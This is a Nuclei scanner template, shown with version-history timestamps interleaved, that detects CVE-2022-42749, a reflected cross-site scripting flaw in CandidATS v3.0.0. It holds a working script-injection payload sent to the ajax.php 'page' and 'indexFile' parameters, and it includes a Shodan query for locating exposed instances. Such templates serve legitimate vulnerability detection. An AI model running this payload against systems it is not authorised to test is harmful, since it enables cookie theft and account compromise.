nuclei-templates/cves/2022/CVE-2022-42749.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2022-11-04 13:24:26 +00:00
id: CVE-2022-42749
info:
name: CandidATS v3.0.0 - Cross Site Scripting.
author: arafatansari
2022-11-09 07:33:32 +00:00
severity: medium
description: |
CandidATS v3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
2022-11-04 13:24:26 +00:00
reference:
- https://fluidattacks.com/advisories/modestep/
2022-11-09 07:33:32 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-42749
classification:
cve-id: CVE-2022-42749
2022-11-04 13:24:26 +00:00
metadata:
verified: true
2022-11-09 07:33:32 +00:00
shodan-query: http.html:"CandidATS"
2022-11-09 07:45:46 +00:00
tags: cve,cve2022,candidats,xss
2022-11-04 13:24:26 +00:00
requests:
- method: GET
2022-11-04 13:27:09 +00:00
path:
2022-11-09 07:33:32 +00:00
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'
2022-11-04 13:24:26 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-11-09 07:33:32 +00:00
- '<script>alert(document.domain)</script>'
- 'candidat'
condition: and
- type: word
part: header
words:
- text/html
2022-11-04 13:55:39 +00:00
2022-11-04 13:24:26 +00:00
condition: and
- type: status
status:
- 404